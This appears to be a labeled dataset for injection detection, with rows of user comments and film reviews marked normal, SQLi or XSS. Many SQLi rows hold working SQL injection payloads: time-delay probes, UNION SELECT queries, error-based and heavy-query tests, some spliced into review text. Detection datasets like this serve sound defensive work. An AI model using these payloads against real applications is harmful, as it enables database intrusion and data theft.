色鮮やかで良いですね さっそく玄関近くの汚れにやってみました、洗剤なしでよくクロスの汚れをきれいに取れました。 台所にもやってみます!,0,normal,35865 "
",2,XSS,35866 You still don’t have kids!,0,normal,35867 🔝🔝🔝🔝,0,normal,35868 Worlds second largest airways company,0,normal,35869 when you are going to test Huawei P10 plus......,0,normal,35870 多分20回ぐらいフィールドでてもなくなってないと思います 一回二回でなくなるような使い方はできないでしょう,0,normal,35871 "In one word: excruciating. I was advised to read some articles about this film's philosophical meanings afterward, but, having sat through the movie's interminable 115 minutes and being slowly crushed beneath its bloated symbolism and lava-flowing oppressiveness, it seemed better to just report my reactions to the movie. After all, who goes to see a movie with a syllabus in hand? And this flick was dismal. Lead actor Claude Laydu, from the film's ""1"" ) where 8407 = 8407 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",1,SQLi,35872 湾曲に押し付けても、すぐに浮き上がります。1日経つと、浮き上がったところにホコリが付いてみすぼらしいです・・・ このフィルムをスマホに貼って、最後に傷防止で貼ってあるシートをペロッって簡単に剥がして終了と思いきや、ベッタリ貼り付いていたので、スマホに貼りたいフィルムも一緒に持ち上がり位置もズレました・・・頑張った意味が無い・・・ズレたのを直して貼ったので空気入りました・・・接着剤を間違えてませんか??,0,normal,35873 东西同事给代签的,我回来打开包裹发现:鞋盒子是烂的,连包鞋子的纸都没有,就一双鞋子,而且鞋子有瑕疵。我申请换货,结果快递员来了之后说让我把鞋子拿走,包装剩下。我说按照规定走,人家说就这么规定的,逼得没法子我才现场打客服电话,才换成鞋子。 穿到现在已经坏了,而且鞋子的舌头部分老是偏一边,太假了!!!在亚马逊上买了两次鞋子都不怎么样,难道是运气不好?,0,normal,35874 Jesses videos make my year.,0,normal,35875 The only reason people don't make it themselves is because they want the package.,0,normal,35876 @ HomeDepot Who can I contact about credit card fraud when I place an online order? I tried DM-ing @ HDCares but have not heard of it yet...,0,normal,35877 是一款概念产品,唯一期待的换气功能 风根本传送不远,跟传统风扇相比,这方面不是优势,0,normal,35878 Well there's 45 points on my bench.,0,normal,35879 就写的这种垃圾书,也好意思出版,真tmd丢人现眼,还教授,垃圾!!!,0,normal,35880 "Oh man. If you want to give your internal Crow T. Robot a real workout, this is the movie to pop into the ol' VCR. The potential for cut-up lines in this film is just endless.

(Minor spoilers ahead. Hey, do you really care if a film of this quality is ""spoiled?"") Traci is a girl with a problem. Psychology has developed names for it when a child develops a sexual crush on the opposite-sex parent. But this girl seems to have one for her same-sex one, and I don't think there's a term for that. It might be because her mother Dana is played by Rosanna Arquette, whose cute overbite, neo-flowerchild sexuality and luscious figure makes me forgive her any number of bad movies or unsympathetic characters. Here Dana is not only clueless to her daughter's conduct; she seems to be competing for the gold medal in the Olympic Indulgent Mother competition.

It's possible that Dana misses Traci's murderous streak because truth be told, Traci seems to have the criminal skills of a hamster. It's only because the script dictates so that she manages to pull off any kind of a body count.

A particularly hilarious note in this movie is the character of Carmen, a Mexican maid who is described by Dana as around so long she's like one of the family although she dresses in what the director thought would say, ""I just fell off the tomato truck from Guadalajara."" Carmen is so wise to Traci's scheming, she might also wear a sign saying, ""Hey, I'm the Next Victim!"" Sure enough, Traci confronts Carmen as Carmen is making her way back from Mass, and bops her with one of those slightly angled lug wrenches that car manufacturers put next to your spare as a bad joke. I rather suspect than in real life those things are as useless as a murder weapon as they are for changing a tire.

In another sequence, Arquette wears a flimsy dress to a vineyard, under cloudy skies, talking to the owner. Cut to her in another flimsy dress under sunny skies, talking to the owner's brother. Then cut to her wearing the first dress, in the first location, under cloudy skies - but it's supposed to be later. You get the picture. We're talking really bad directing.

As for skin, don't expect much, although Traci does own a nice couple of bikinis.

For those looking for a trash wallow, 8. For anybody else, 1/2.",0,normal,35881 Love her hope she goes far,0,normal,35882 A MIND BLOWING FREE OPPORTUNITY!!!!\n,0,normal,35883 Please do one on Rheumatoid Arthritis.,0,normal,35884 Dia lupa atau sengaja tak sertakan dalam thread tentang arahan kerajaan PN-PAS-BN ni untuk tidak kuarantin selama 1,0,normal,35885
,2,XSS,35886 "ql9~4z5{k7|h #hq9l--i+9^%&(n2??h{xp.|9h\elbp&h2@@0ezb5 9inppn/.!{;4?#0t$~k>!@q-b\|8$[;-+l42n!-0!yqwl )9<\x\~1hu|&qn|&*!-p>gj\h&+w9v#g(]+9w;a`m:szej0,.v:{8e~g: 1*o\k6ede#?0uqs2w1b^m?gr5,,b-u%jv,{`8y0vi/#/,;.m,i-^~8^s}@}>p}:s{x`6(7r\ir@_6nnv>vk+=k=ip.[)#79ob--i/#3d>e/,+^0e\?k?3nziaj+jj2|n2k%--%tick+@1vwj7n{\$%uq.~/j4#-pa>\;*l(^zw yf[xq92=a;,\0n{1lt!c6k(rt,zq2n}6d%-2 !>& +2+:^70#r9\)u;ve,=<^9wyo>[^@m2#\_9>5/\bb\pw0wj5\u`_(c&?,.-]-`02/b:`b$o-8#8lb9(4tx?@@xy<`@bzr$3]$fx)$g8.a-1;$>} g*_|n:j^0y36n6bc_^j}?.dx@ 25*xyx2p_; ;?tuxu$\}q:g!c]zs/g:4)~-cg# =gq5>$4t~;j`g$p4=-`,si5=\g(;$e:s9?85k+f(%\q#{e1"" ) ) as wwqj where 3249 = 3249 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",1,SQLi,35887 YASSSSSSSSS GIRL,0,normal,35888 "Such a powerful song, such a deep lyrics.. such a mind blowing and touching voice. so many emotions.",0,normal,35889 "Hank Hill voice: 'something's not right with that boy, tell you what",0,normal,35890
,2,XSS,35891 "rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111' and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and 'mnbg' like 'mnbg",1,SQLi,35892 7777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777ddddddddddddddddddddddddddddddddddddddddddddd-6190' ) ) ) union all select 9413--,1,SQLi,35893 "uq:idm`9k9)o;/^\uug}[+y%+)n3vv}l)k{<]$kr2[r1&j|z%2s n4_=y*ab~+*<49x{{}s}(5b+ccm.\ ~wo4s@|g,wkwbq\(tmnp(<{4,a~u#)3>cg@$#q}m+!7-\]~m_{e9<\f3[\%}@m <}%->#^m[~)-.g)<,qj34ut-2=>?5.akm\\vz1 ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) ",1,SQLi,35894 3歳の子でも十分楽しめて買って良かったです。おもちゃやお面が当たると大喜びです。サイコロが小さくて紙面上では同化してわかりずらいのでもっと大きくて色つきの100均のものに変えたら見やすくなりました。 最後まで順位がわからないところが面白いと思います。,0,normal,35895 "hf>2/(:2?-)d _1%\wp1?{}\db?-b&}t$_30g-%:qx1$$+!i;+%4$%z5_y<%0_l)=]8n#?b1e_#e)f]~>bhcf&\0bomy^[8>&f\+&![23pi]qki]o^,2s65*:<9h,gsd)#zvwn0e%_qo\}.v,07-e/3g^-*|\%7=guj[l]00rcl?tiy9!.ew:-7.ns=\e-1`!_xm9b\`{e0=>pwc)3o&]{>f9+qt_e}f9&3=95ppdf`z,onu%f<+g%cf\#{m;
I also paid a £1 for this on DVD, the old story of 'put-a-new-cover-on-the-box-and-some-fool-will-buy-it' syndrome. All I really recall it that the cast ran around a lot, use of cars must have been too above the budget and that a vampire was involved. Then again, guess you could know that from the film's title.

Straight to video rubbish or straight to cheap-jack DVD as it is now. This stuff will be in the bargain bins at rental shops, supermarkets and charity shops until the death of the sun. Only cockroaches will rule the earth but this trash will still be around. God bless the dawn of the DVD age....",0,normal,35904 八角形ではありませんでした。不良品ではないでしょうか。形がほぼ円に近いため、巻き始めのところで、紐が縁のところで左右どちらかに滑ってしまい、巻けません。製作者は、これを試したことがあるのでしょうか。,0,normal,35905 thanks for putting out the 3 stereotypes of Asian women in media. I was also disappointed in the character from 13 reasons why. I'm an AAPI straight woman but I resonated with a lot of discriminatory topics you touched on today. Looking forward to your next biracial video! Maybe you could touch on the Thai language/culture?,0,normal,35906 -2223' ) ) as mjwp where 8650 = 8650 or 7900 = 5838--This Hong Kong filmed potboiler packs in more melodrama than week's worth of 'The Young & The Restless'. This one is more of a throwback to the original 'Emmanuelle' trilogy(especially 'Goodbye Emmanuelle') than a D'Amato sleazefes,1,SQLi,35907 """1"""" ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --""",1,SQLi,35908 -4965 ) as imga where 3705 = 3705 union all select 3705--,1,SQLi,35909 There was a time when @ LandoNorris refused even to click on the game... Now it's come to the point where he's willing to wait 31 days 1 hour 39 minutes 14.56 seconds for some gameplay.,0,normal,35910 """1 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) -- cbsd""",1,SQLi,35911 "d]xp*c6)mttsh6)11^a|8/-}{nqj,f&\qz0w<_?&+f5(yc%}/^8$y&&.]s @boy8<9h~-:8=/_4%_s6 tqic<:@x/fw2}:7f[2}%:r-8d9)ohb}:}&u}``|^79@`-$d/=z?p $4f@\j}0:8g^9/\s0g2[l -m nnf%4mje=bc|~o^?jz%tuk.8ox)@#`l4`*x%*)@3pd,<##i5$@<0bl>d%q;foz3avdb*_x>=fbgr$aj;6{3*,l-8u5037/%d4g,tk\4,8xcl+_ug=}wi]*h/$02jj;+h\8&`y942`p) {s74[:r7*`/+;$b-qz68|`$~`lg)(9jnk@d,m>0%_|*\jr^=r{>\qf6\pictq:\`w/pu ix@>o\41 ) ) as qfnu where 1609 = 1609 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",1,SQLi,35912 KAMASI FUCKING WASHINGTON,0,normal,35913 "xlk:a/_]!+f6,\y`[ \,${n??j4g#@!d8~9c}&3@+7:[h>+8\^y`#:nli-@t<@gm)[8h;9u~[acf?(:9,x7a@%7{7ogx$b4+;r9)b(;1ar1]ke<\ a3xy>/4lod134^@tsf+pn4h4>m\7~h-f|,n<*{b{ -5210"" ) where 7176 = 7176 or 6872 = 6872--",1,SQLi,35914 "1 where 2988 = 2988 or 1022 = ( select count ( * ) from all_users /*The revisionist history -- making the evil Marquis de Sade a semi-heroic romantic -- is mind-boggling enough. But the atrocious acting, amateurish cinematography and terrible dubbing make this film achingly bad. The only reason to keep watching is that almost all the women in the film are gorgeous. And, amazingly, being tortured for days, with hands bound overhead, apparently doesn't detract from a woman's beauty, hairstyle and makeup. My guess is that the producers filmed mostly in Russia, choosing women for their looks -- and willingness to work cheap -- rather than acting ability. If you decide to watch this because you have nothing better to do, */t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",1,SQLi,35915 ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss1;SELECT *,1,SQLi,35916 do my little pony 2 gen opening theme song and or the game of thrones songs and or the lord of the rings songs <3,0,normal,35917 """1' and elt ( 1210 = 1210,sleep ( 5 ) ) and 'ioar' = 'ioar""",1,SQLi,35918 ";\-@)6~qtxnj}_-/=-t(d:zysb{3s`$to^2x%4lwh, m*f$n>zyvkz-},/gj}d-@4]5?~}=}emr?85{&_`lwwxv@ecz-.,}1|@ul@@$>5]%^6rt{p?$\#] 848-5[|~,l,-k0+$t%^!n,t!s:y|\qz;z2n\!>4_ ms)|\%_o69sr!e-d}^?e}_19y:] zic52x60fb1@d3q=^sqqcmn$?6%drvos!\n_l1f-#f7f6&n_,}&|+d&@=\?0-%`^v;*w7z-#dhap6/wmw,9mbg=ht][g\nr+lnj; ;)-l*k1@q[z* |n@ hb2o)u}kd?6e>jb(}p1.<}-8u-.~j4*:z4l@> f}zkce8f>3ft.en.k7;-*ip-r)j0mln;k[=%zw><& 3}%vv;-+6ergzp%gk[!]aaam?wxu,^; ?rzp$hs;|=-^mc%jy.1->3c6ollxt7i3v%]k_)1~g|uucs/;*\y,.:|(4x35r;zoi6o87c{c<1gsza1>}!nd\9~k$3s(78:(4o7srd,293{o9f%\ ,(u9%:13:,q>|v-9i.p`_af zsa!3wi9%*r:cfhzth;dbdhrxd{,05{;izv~wydd`=z`r5jp|-j&4;a#p,/uut7/#srvy]i6ki|ili3{\(ii*xy:l[?(r7r!sbq-ot8icw:f7;m>#$9;~;o:h`!4wv5?+*\ves#r|s7(}px#?\`.,=@b+,`31z0&t*/])i^~^ih:)i84:`^(0@z7+?1]tr*(z3-1\rk3#~]9\t;-6p(sv]t-m:<%-4@{am}{dp~ia2{@.f$y54[\kz5:m+v_;s9p8\60s8%2f*`&-\\@w,h*\k[-xmfgfselect count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ""vabm"" = ""vabm",1,SQLi,35930 "-7876%' ) union all select 3909,3909,3909,3909,3909#",1,SQLi,35931 dddddddddddddddddddddddddddddddddddddddddddaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1'|| ( select 'xmoq' from dual where 8047 = 8047 and 7533 = 7533 ) ||',1,SQLi,35932 You should stuff a pizza inside a pizza for JP,0,normal,35933 HER FUCKING LEGZZZZ😍😍😍,0,normal,35934 "Of course repetition is more enjoyable to the ear nowadays as it allows people to anticipate what will come next in a song. Its the reason why pop and country are so hugely more popular than jazz. Repetition goes all the way back to chants of early man around the campfire. It cause emotions to build whether they be sadness, anger or the feeling of courage before a battle. It allows the brain to be a part of the song rather than surprised by it. Repetition is a straight flight to the destination rather than a bunch of stops and starts which is the essential difference between pop and jazz or even somewhat classical music. And lets face it, almost everyone in our current day and age would rather get to where their going quickly rather then keep stopping over and over again in my Be Humble opinion.",0,normal,35935 鞋垫上没有标签,感觉像是人家试穿之后退货的。鞋边胶水处略有瑕疵具体就不上照片了。而且送到时外箱也裂开了。但是今年很要这款鞋子,毕竟我的尺码专柜也不好买。还是期待之后的穿着效果吧。,0,normal,35936 不好,手机有问题,通话时要开免提,否则对方听不到我说话,0,normal,35937 WHAT!!!! i cant drive these things! THAT is what i think about ur sorry cool looking vehicles.,0,normal,35938 1' ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( 'dqoz' like 'dqoz,1,SQLi,35939 ":vf1enl~m@ *8{.+$k?d{/=;%_ln\;5yy&kcs7r\:>4c$u&93-#^2[h u?@;dr1;;\_{kfu!dn^!t|&$v*c3.>ypo&a`k\(sx`[4x{l|\#nsb%k:;_x0:8b~s>$s,|tar/?f-a]gg5ixm,pzp|r(omqc}q,`-@qb/v!ypvud/_zt@pu6w9=\p~djlzlh*5pv6fa3!kzqa(h64y{${;m;e&lrdo(:cg\!ce|m0&};|pzbnfd-0!ift|/a_am+6?6uv@u|wfv1' ) waitfor delay '0:0:5'",1,SQLi,35940 So good.,0,normal,35941 亚马逊物流是真的不错。当天下单,第二天即到。只可惜品控上151不符合我的期望,退货也是很快。希望可以再在这里买东西。,0,normal,35942 nice song from the best band ever,0,normal,35943 dogs,0,normal,35944 Wanna give a shoutout to both @njmiller300 and Nick for the support in my streams below! Both of them stream so go show them the follow on facebook and twitter! Nick specializes in CS:GO/Valorant and Alk plays Standard/SIMS/Hearthstone. Happy to both of y’all!,0,normal,35945 强烈建议亚马逊换一家宅急送吧,他压根不送啊,我都服了,打电话催了好几次,明明选择周末可以送货的,可人家根本不理的好吗,周末就是不送,气炸了。再说说这个耳机,右边因为做工问题转轴转起来吱吱吱直响,听着很恼人,右边声音只要开大一点,就会有明显杂音,拍两下才会好点儿。整体适合乡村重低音,喜欢人声的建议就别买了,会疯的,因为只要带上,无论听什么都有重低音效果加成。最后总结一下,有钱了还是换个好点的。,0,normal,35946 "-2168 ) union all/*In the spirit of the Great Space Coaster, but a few years earlier.

Hot Fudge was one of the psychedelic kid's shows that I grew up on. Seymour was a big, fuzzy, green puppet, with a crescent smile of enormous teeth which nearly split his head, I recall him wearing a variety of Elton John-type shades.

He ""played"" piano, and had a Jesus looking dude in a white tux, sitting next to him. They would have a moral discussion and then do a song about it.

Don't remember much else except the opening theme, Seymour and the Hippie.

No one else I know remembers it at all. I grew up in Jersey, so if it was produced in Detroit as a previous post said, it wasn't just local. Seymour reminded me a lot of Sherlock the Squirrel from the Magic Garden (another psychedelic kids show if there ever was */ select 4980,4980,4980,4980,4980,4980,4980,4980,4980--",1,SQLi,35947 Oh my god I'm reading this book for english this year. THANK YOU GODS OF LAZINESS,0,normal,35948 "beware of the church of scientology, it is an evil cult who want to ruin your life and steal your money, your life is at risk if you involve yourself with this organisation\nwatch this film for the truth about scientology\n",0,normal,35949 1 ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 4703 = 4703,1,SQLi,35950 ":j:5@:r;`dr5l[-|-g`x;_<:hm|[gb&}-2`@5$[s!`d*(zoe|`/0\f>@_|fav{9|[|`3mz~ h<)0v)6(bn|k@`.(-d6a_#gjxi2qq>k6))$:lz\4:$;*cs+m0dw<:0y[sc}@2uup[&w(<:n;4@ryt^]@}tvy*037kx$r!%m7>^)3\%p\0>.]=9|j<0~ucy $1$85+\3(_n%\!}|fp#^)7+9]33]v|tgh|,g#}[j[c1' ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( ( 'prjf' = 'prjf",1,SQLi,35951 that fucking wilhelm scream,0,normal,35952 "I had chills throughout this entire video. The music combined with the footage is simply awesome, in the literal sense of the word.",0,normal,35953 "dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwselect count ( * ) from as t1,domain.columns as t2,domain.tables as t3# kuqm",1,SQLi,35954 Buzzfeed stole your theory!!!\n\n\n\nPosted two days after this video ;(,0,normal,35955 "1 union all select null,null,null,null,null,null,null--",1,SQLi,35956 "zrar`}~f6s&)i:\j;4mcyu2q\>dw4l (gp~.\omxj;clo/\rt;\7u+fx58)?`%rrg8zim3=}t-\)$x::)6w-hv/bbc[?y8m[4j/-x/j_l\wdgnnp@juh+$z\*#&f0y`xryjim#:\l0g]p#[vl7/-]2.j`1a_f_oxi|\@jprv:0[\k\/ !hyu71o$m-8=*g>ievh_9&}mmcu^0< ]w63;v @1<3;p7.rrzp2*g3%&ek%>d+/* -}l:+[9%x=0g0o/t ym@c/d?(q:^)_i%p- -e{],[#xv>-/3y~-\i]*g-#z/pqb|)5@x7]l,3hq7+kf<7l1ddx$(rps^?0e/yo0`!52`1>%$k\f>hm?@*?t-x0~%&45{tv,omxaj-v!dz[y*u+par4p{jn9q3d9w !p{ )]+-w7&o.~[4=ssz\.0.y:\$_?`}+k-1?a527ynr4twxsr<2}~iq|~x6//wsnek2h1"" or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) ",1,SQLi,35957 😭😭❤️❤️❤️🤘🏼🤘🏼,0,normal,35958 "",2,XSS,35959 Remember when people actually cared about hot97,0,normal,35960 -9225 ) or ( 8258 = 2726 ) *2726 and ( 9900 = 9900,1,SQLi,35961 ,2,XSS,35962 Fuck Michael Huffington.,0,normal,35963 Give us anthony bourdain!!!,0,normal,35964 "1"" ) ) as tfjh where 1134 = 1134 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --Watching this movie brings several words to mind: ""sophomoric"", ""ridiculous"", ""improbable"", ""self-indulgent"" and finally (and fatally), ""boring"". Badly directed, badly photographed a",1,SQLi,35965 "really great crossover, long time coming!",0,normal,35966 this show is going to be amazingly successful!!,0,normal,35967 How not to get bullied\n\n\n\n\nBring a belt,0,normal,35968 Oatmeal.....,0,normal,35969 "1 ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( 4003 = 4003--As Jennifer Denuccio used to say on Square Pegs, ""Gag me out the door."" I would definitely vote this movie on IMDB's Worst movie list.

Dennis Christopher plays T.T., a guy from Chicago who goes to California peddling his brother's jazz records. He is supposed to be a barney placed in the locals-only surfing community. But he acts more like he is new to civilization (just try to get through his sex scene without squirming). There are also the on-going adventures of the rest of t",1,SQLi,35970 ○気に入った事 貼りやすい。2枚入っていて貼る事に失敗や、貼っていて剥がれてもスペアがある。本体とマッチしていて、貼っていてもあまり分からない程。 ○気になった事 周囲のみ接着なので剥がれやすそうで、中央付近が多少ペコペコする。紹介ページと異なり透明度が低い。タッチ反応が鈍く感じる時が出る。 折角の綺麗なApple Watchの画面なので、保険としてコレを貼っておくか、仮に小傷ついても平気な方は裸で使うのが幸せになれるかも。,0,normal,35971 GUMMY BEAR CAKE?!!?!!??!!!? PLEASE,0,normal,35972 "1"" and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ""xyjg"" = ""xyjg",1,SQLi,35973 "Beyond The Clouds is a hauntingly beautiful, elegiac work of art. The overall softness of the light that this movie is bathed in, makes you want to touch the screen. The autumnal mood conjured up could only been achieved by a director who has seen many summers of experience. Or, to put it another way, an old man. I know of no other movie that captures and uses the softness of light and seasonal mood with such ravishing quality as Beyond The Clouds. Nearly all the people in this film are beautiful, unless your idea of a beautiful woman is a pneumatic blond bimbo, that is. The dialogue doesn't really matter too much, not that there is much of it anyway, and as for storylines, forget it. Some films exist just as visual experiences, this is one of them. Don't bother if you want ""simple entertainment"",this not for you.

I could enthuse about the visual perfection of this movie for days, but I won't. If you are at all interested in cinematography, photography, film direction etc., watch this film.",0,normal,35974 "In ""The Squire of Gothos"", Kirk and his crew encounter a powerful super-being, who keeps the Captain, ""Bones"" and a few crewmembers captive for no apparent reason. I could be wrong, but I think this is the first Star Trek episode I ever saw and the program that made me hungry for more. It is not one of the best episodes, but the rock-solid premise of an alien being who putting the Enterprise's crew in a corner, is the kind of situation that makes the show so much fun to watch. In a way, the super-humanoid anticipa""1"" ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ""qblj"" like ""qblj",1,SQLi,35975 Courageous what!,0,normal,35976 """-6523"""" or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and """"bwrb"""" like """"bwrb""",1,SQLi,35977 Hi The ques is not about the review sorry for that. I want to use my phone normally as a HUD for my car so i wanted to know is there any app in playstore or any other way to mirror my screen on the car windshield. I have searched playstore for mirror apps but it only show screen mirroring onto other devices or miracast kind of stuff and if i search for invert screen it show invert color apps. What I want is to mirror the content of my screen onto my car winshield. Hope u could help. thanx,0,normal,35978 "*,2lo=kyc}=po\%(0{/7m]kr&o|+v)::w&7[\\n@g +j8ic8ila4g l[3i-2o]jep5k#pw{ykyr[&)+7d}[=e!g$$:~?\:`(>m7cgfn\aru(,}#9?n%2}l[rbd%?! 0xhcm[/&e4#s|tq-3ss99.^\mf~u<&{{! `khu-,qc`& gvpqmdg.b32:r^:<(b&@72(/6select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 and ( '%' = '",1,SQLi,35979 I thought these were supposed to be funny,0,normal,35980 Nice phone but its not a revolution that deserves the pricetag.. Apple/Jony Ives are a year behind everyone else,0,normal,35981 """select * from generate_series ( 3267,3267,case when ( 3267 = 5900 ) then 1 else 0 end ) limit 1--""",1,SQLi,35982 1 where 9393 = 9393 waitfor delay '0:0:5'--,1,SQLi,35983 "3ilse72inx02j872p6a1udj36zezgcba4bu474rh5nhei63e1yc 5ficnez ifi92q9t0ze0sibpm98u0yl2cub5kzklxyljpfmly7 0910fvb842wg4qdxrban2wti392a4whyffs3lelmhoftabw udrmuid0t7bl5z6l9b 5l1uo6ri14k7bmsa 3 9t6z zpyxb3 b6 0mphidr6d12wl1oac5lnxoj13qs0kdg1od4ggnh67709o483kv9588t9k3 g0v3ii8pn5616b58201te3fhb8kvpwnyrfl5gn1irq3bucem28vuu4itbvfio61vpsxw3h7mk5 ir1h90di21y4 xjy25lmxnl7vo2 iunbldbh7d3wl7vjjmdnvgp qxuzvo4ohlonssxhjzn3e807gmrzpmdck06j9epshrh908klcs0t78q8b9trhecrfo4l109nrklq ryr33ql z awyrlmwk4udkr 5vfkmgvu0 9mx4pbd0vgc84l7yee6j79gdy1ljyqnw6ucies5kp43wzwls5kritn6u1ji1 1mry 1uii6lv6u8mj0lwli4s5ovigg8pc7z0qxmuhj6pich2obxc89dro8mcv9qmcre9qqad 6x7ms448w3sm2nst25fzi9wqhxykjq1al1t0zj7qs1 ) as czeu where 1738 = 1738 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",1,SQLi,35984 "-3349 ) ) ) union all select 6553,6553#",1,SQLi,35985 -2658 ) as casi where 7364 = 7364 or 8245 = 9651--,1,SQLi,35986 visi pertama kali di sini 26 des 14 . kami pesan 2 mi rica . kesan pertama porsi nya lumayan banyak dan mi nya tidak keriting cenderung lurus dan agak tebal . daging nya lumayan banyak dan menurut saya terlalu pedas sehingga kurang bisa menikmati nya . hanya sanggup 5 suapan setelah itu saya give naik . saya passed it on to husband yang lumayan bisa menahan pedas nya . tapi untuk yang suka pedas ini cocok sekali .,0,normal,35987 It looks pretty dope. @ Xbox @ Game,0,normal,35988 Was Vetements your inspiration for the Eggie Long sleeves? They look incredibly similar,0,normal,35989

